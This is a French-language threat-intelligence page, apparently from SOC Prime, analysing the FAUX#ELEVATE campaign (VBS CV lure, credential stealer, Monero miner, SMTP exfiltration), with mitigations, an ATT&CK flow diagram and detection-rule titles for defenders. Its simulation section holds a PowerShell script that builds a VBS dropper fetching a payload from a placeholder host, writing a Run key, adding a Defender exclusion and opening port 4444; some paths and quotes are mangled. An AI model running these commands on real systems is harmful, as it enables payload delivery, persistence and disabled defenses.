SOC Prime Bias: Medium

26 Mar 2026 16:07

Analyse de FAUX#ELEVATE : des acteurs de la menace ciblent la France avec des appâts CV pour déployer des mineurs de cryptomonnaies et des voleurs d’informations ciblant les environnements d’entreprise

Author Photo
Ruslan Mikhalov Chef de la Recherche sur les Menaces chez SOC Prime linkedin icon Suivre
Analyse de FAUX#ELEVATE : des acteurs de la menace ciblent la France avec des appâts CV pour déployer des mineurs de cryptomonnaies et des voleurs d’informations ciblant les environnements d’entreprise
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Une opération de cybercriminalité exploite un fichier VBS de CV malveillant pour cibler les environnements d’entreprises francophones. Le dropper est fortement obscurci et est conçu pour s’exécuter uniquement sur des machines jointes à un domaine, où il livre un malware voleur de crédentials ainsi qu’un mineur Monero. La campagne utilise des services de confiance tels que Dropbox et des sites WordPress marocains compromis pour héberger des charges utiles. Les données volées sont exfiltrées via SMTP vers mail.ru, et le malware efface ses traces après exécution pour réduire la visibilité lors d’une enquête judiciaire.

Enquête

Les chercheurs ont rétro-ingénié le dropper VBS, découvert ses vérifications environnementales, et cartographié la chaîne d’infection multi-étapes complète, y compris l’extraction 7-Zip, un RAT personnalisé nommé RuntimeHost.exe, le vol de crédentials du navigateur ChromElevator et l’activité de minage XMRig. Ils ont également identifié l’infrastructure de soutien comme des adresses IP, des entrées DNS dynamiques et des serveurs WordPress piratés. La persistance était liée aux clés Run du registre et à une tâche planifiée dissimulée.

Atténuation

Les défenseurs devraient bloquer les fichiers VBS suspects et appliquer des contrôles stricts sur les pièces jointes d’email. La surveillance doit se concentrer sur l’exécution anormale de wscript.exe, les commandes PowerShell qui ajoutent des exclusions de Defender, et les changements de registre affectant EnableLUA. Les organisations devraient restreindre le SMTP sortant des applications non-email et surveiller les connexions aux infrastructures connues de Dropbox et de pools de minage. Toute clé de registre identifiée ou tâche planifiée doit être supprimée ou mise en quarantaine.

Réponse

Les équipes de sécurité devraient détecter la création des clés Run “Microsoft Media Service” et “z_MicrosoftEdgeAutoLaunch_2EDFBF”, ainsi que de la tâche planifiée cachée “MicrosoftUpdateService”. Des alertes devraient déclencher pour les processus wscript.exe qui contactent Dropbox ou les domaines WordPress documentés. Les fichiers malveillants doivent être mis en quarantaine, l’hôte isolé, et les crédentials du navigateur exposés réinitialisés. Une revue judiciaire devrait ensuite déterminer si des données volées ont été exfiltrées via mail.ru.

"graph TB %% Définitions des classes classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Définitions des nœuds step_phishing["<b>Technique</b> – T1566.001 Phishing : Pièce jointe d’hameçonnage ciblé<br/><b>Description</b> : Email avec pièce jointe malveillante qui, lorsqu’elle est ouverte, livre la charge utile initiale."] class step_phishing action step_user_execute["<b>Technique</b> – T1204.002 Exécution utilisateur : Fichier malveillant<br/><b>Description</b> : La victime exécute le fichier VBS joint, déclenchant le dropper."] class step_user_execute action step_dropper["<b>Technique</b> – T1059.005 Visual Basic (VBScript)<br/><b>Technique</b> – T1027 Fichiers ou informations obscurcis<br/><b>Description</b> : Script VBS obscurci qui agit en tant que dropper extrayant des composants additionnels."] class step_dropper action step_domain_check["<b>Technique</b> – T1069.002 Découverte de groupe de permissions : Domaine<br/><b>Description</b> : Vérifie si l’hôte est joint à un domaine pour adapter le comportement."] class step_domain_check technique step_uac_bypass["<b>Technique</b> – T1548.002 Contournement du contrôle de compte utilisateur<br/><b>Technique</b> – T1562.001 Affaiblir les défenses : Désactiver les outils de sécurité<br/><b>Technique</b> – T1564.012 Cacher les artefacts : Exclusions de Defender<br/><b>Description</b> : Élévation des privilèges, désactivation des défenses et ajout d’exclusions."] class step_uac_bypass technique step_download["<b>Technique</b> – T1102 Service Web<br/><b>Technique</b> – T1102.001 Dead Drop Resolver<br/><b>Description</b> : Récupère des charges utiles supplémentaires depuis Dropbox ou des emplacements web."] class step_download technique step_deploy_toolkit["<b>Outil</b> – RuntimeHost.exe, XMRig Miner, Stealers de navigateur<br/><b>Description</b> : Déploie des composants pour le minage, le vol de crédentials et d’autres exploitations."] class step_deploy_toolkit tool step_cred_access["<b>Technique</b> – T1555.003 Crédentials depuis les navigateurs web<br/><b>Description</b> : Extrait les mots de passe et cookies stockés du navigateur."] class step_cred_access technique step_collect_files["<b>Technique</b> – T1005 Données du système local<br/><b>Description</b> : Rassemble des fichiers du bureau de l’utilisateur pour l’exfiltration."] class step_collect_files technique step_exfiltration["<b>Technique</b> – T1048.002 Exfiltration via un protocole non-C2 crypté : SMTP<br/><b>Technique</b> – T1071.003 Protocoles Web : Protocoles de messagerie<br/><b>Description</b> : Envoie des données collectées via SMTP chiffré."] class step_exfiltration technique step_resource_hijack["<b>Technique</b> – T1496 Détournement de ressources<br/><b>Description</b> : Utilise XMRig pour miner des cryptomonnaies sur l’hôte victime."] class step_resource_hijack technique step_process_injection["<b>Technique</b> – T1055 Injection de processus<br/><b>Description</b> : Injecte un code malveillant dans explorer.exe pour cacher l’activité."] class step_process_injection technique step_c2["<b>Technique</b> – T1102 Service Web (HTTPS/DNS dynamique)<br/><b>Description</b> : Maintient le command-and-control sur le trafic web chiffré et les ports personnalisés."] class step_c2 technique step_persistence["<b>Technique</b> – T1547.001 Clés Run du registre / Dossier de démarrage<br/><b>Technique</b> – T1053 Tâche/Emploi Planifié (Caché)<br/><b>Description</b> : Établit une persistance via une clé Run et une tâche planifiée cachée."] class step_persistence technique step_cleanup["<b>Technique</b> – T1070.004 Suppression de fichiers<br/><b>Description</b> : Supprime les artefacts et les journaux pour échapper à la détection."] class step_cleanup technique %% Connexions des bords step_phishing –>|leads_to| step_user_execute step_user_execute –>|leads_to| step_dropper step_dropper –>|leads_to| step_domain_check step_domain_check –>|leads_to| step_uac_bypass step_uac_bypass –>|leads_to| step_download step_download –>|leads_to| step_deploy_toolkit step_deploy_toolkit –>|enables| step_cred_access step_deploy_toolkit –>|enables| step_collect_files step_cred_access –>|combined_with| step_collect_files step_cred_access –>|supports| step_exfiltration step_collect_files –>|supports| step_exfiltration step_deploy_toolkit –>|enables| step_resource_hijack step_deploy_toolkit –>|enables| step_process_injection step_process_injection –>|provides| step_c2 step_c2 –>|used_by| step_exfiltration step_deploy_toolkit –>|establishes| step_persistence step_persistence –>|followed_by| step_cleanup step_exfiltration –>|followed_by| step_cleanup "

Flux d’attaque

Détections

Tentative possible de communication par domaine de recherche d’IP (via dns)

Équipe SOC Prime
26 mars 2026

Désactivation du suivi en temps réel de Windows Defender et autres modifications de préférences (via cmdline)

Équipe SOC Prime
26 mars 2026

Exécution suspecte depuis le profil utilisateur public (via process_creation)

Équipe SOC Prime
25 mars 2026

Évasion de défense possible en extrayant une archive chiffrée à l’aide de 7-Zip (via cmdline)

Équipe SOC Prime
25 mars 2026

LOLBAS WScript / CScript (via process_creation)

Équipe SOC Prime
25 mars 2026

Modification suspecte des exclusions de Defender (via cmdline)

Équipe SOC Prime
26 mars 2026

Modifications suspectes des préférences de Windows Defender (via powershell)

Équipe SOC Prime
25 mars 2026

Points possibles de persistance [ASEPs – Ruche Software/NTUSER] (via registry_event)

Équipe SOC Prime
26 mars 2026

Tâche planifiée suspecte (via audit)

Équipe SOC Prime
25 mars 2026

Nom de fichier court (via cmdline)

Équipe SOC Prime
25 mars 2026

Contournement UAC possible – Tentative de désactivation de l’UAC (via registry_event)

Équipe SOC Prime
25 mars 2026

Fichiers suspects dans le profil utilisateur public (via file_event)

Équipe SOC Prime
26 mars 2026

IOC (HashSha256) pour détecter : Analyse de FAUX#ELEVATE : Les acteurs menaçants visent la France avec des leurres de CV pour déployer des crypto-mineurs et des voleurs de crédentials ciblant les environnements d’entreprise

Règles AI SOC Prime
26 mars 2026

IOC (SourceIP) pour détecter : Analyse de FAUX#ELEVATE : Les acteurs menaçants visent la France avec des leurres de CV pour déployer des crypto-mineurs et des voleurs de crédentials ciblant les environnements d’entreprise

Règles AI SOC Prime
26 mars 2026

IOC (Emails) pour détecter : Analyse de FAUX#ELEVATE : Les acteurs menaçants visent la France avec des leurres de CV pour déployer des crypto-mineurs et des voleurs de crédentials ciblant les environnements d’entreprise

Règles AI SOC Prime
26 mars 2026

IOC (DestinationIP) pour détecter : Analyse de FAUX#ELEVATE : Les acteurs menaçants visent la France avec des leurres de CV pour déployer des crypto-mineurs et des voleurs de crédentials ciblant les environnements d’entreprise

Règles AI SOC Prime
26 mars 2026

Détection de l’élévation de crédentials et du minage de crypto-monnaies FAUX [Connexion réseau Windows]

Règles AI SOC Prime
25 mars 2026

Détection de la communication par domaine SMTP et C2 [Connexion réseau Windows]

Règles AI SOC Prime
26 mars 2026

Détection de la persistance et du vol de crédentials de la campagne FAUX#ELEVATE [Création de processus Windows]

Règles AI SOC Prime
25 mars 2026

Détection du dropper VBS malveillant et des modifications du pare-feu [Création de processus Windows]

Règles AI SOC Prime
26 mars 2026

Exécution de simulation

Prérequis : La vérification préliminaire de la télémétrie & de la base de référence doit avoir réussi.

Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et visent à générer la télémétrie exacte attendue par la logique de détection.

  • Narratif & Commandes de l’attaque :

    1. Étape 1 – Déposer un VBS malveillant : L’attaquant écrit un dropper VBS qui télécharge une charge utile de deuxième étape et écrit une clé de registre de démarrage pour la persistance.
    2. Étape 2 – Exécuter VBS via wscript.exe avec PowerShell comme processus parent, satisfaisant ainsi la condition parent-enfant de la détection.
    3. Étape 3 – Dans le VBS, invoquer PowerShell pour ajouter une exclusion Microsoft Defender (T1562.001) et Netsh pour ouvrir le port TCP entrant 4444 (T1562.004) pour C2.
    4. Étape 4 – Nettoyer les preuves après succès.
  • Script de test de régression : (PowerShell – autonome ; exécuter avec des droits administratifs)

    # -----------------------------------------------------------------------
    # Simulation de démarreur VBS malveillant – déclenche la règle Sigma :
    #   Image == "*wscript.exe" ET ParentImage dans («*powershell.exe», "*netsh.exe")
    # -----------------------------------------------------------------------
    
    $vbsPath = "$env:Tempmalicious_dropper.vbs"
    $payloadUrl = "http://example.com/payload.exe"   # URL de remplacement
    $payloadPath = "$env:Temppayload.exe"
    
    # 1. Créer un VBS malveillant qui :
    #    • Télécharge une charge utile
    #    • Écrit une clé de démarrage pour la persistance
    #    • Appelle PowerShell pour ajouter une exclusion Defender
    #    • Appelle Netsh pour ouvrir une règle de pare-feu
    $vbsContent = @"
    Set objXML = CreateObject("Microsoft.XMLHTTP")
    objXML.Open "GET", "$payloadUrl", False
    objXML.Send
    If objXML.Status = 200 Then
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open
    objStream.Write objXML.ResponseBody
    objStream.SaveToFile "$payloadPath", 2
    End If

‘ Persistance via clé de démarrage Set objShell = CreateObject(« WScript.Shell ») objShell.RegWrite « HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious », « $payloadPath »

‘ Exclusion de Defender via PowerShell (exécuté en ligne) objShell.Run « powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'«  », 0, True

‘ Ouvrir le port de pare-feu 4444 via Netsh (exécuté en ligne) objShell.Run « netsh.exe advfirewall firewall add rule name="MaliciousPort » dir=in action=allow protocol=TCP localport=4444″, 0, True « @

Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Lancer le VBS avec PowerShell comme processus parent
Write-Host "[*] Lancement du VBS malveillant via wscript.exe (parent: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait

# 3. Vérifier que la règle de pare-feu a été ajoutée (facultatif)
netsh advfirewall firewall show rule name=MaliciousPort

# 4. Nettoyer les artefacts (charge utile & VBS) – laissé pour une section de nettoyage séparée
Write-Host "[+] Simulation terminée. Vérifiez les alertes dans le SIEM."
  • Commandes de nettoyage : (exécuter après vérification)

    # Supprimer la règle de pare-feu
    netsh advfirewall firewall delete rule name="MaliciousPort"
    
    # Supprimer l'exclusion Defender
    powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'"
    
    # Supprimer la clé de persistance Run
    reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f
    
    # Supprimer les fichiers
    Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force
    Remove-Item -Path "$env:Temppayload.exe" -Force
    
    Write-Host "[+] Nettoyage terminé."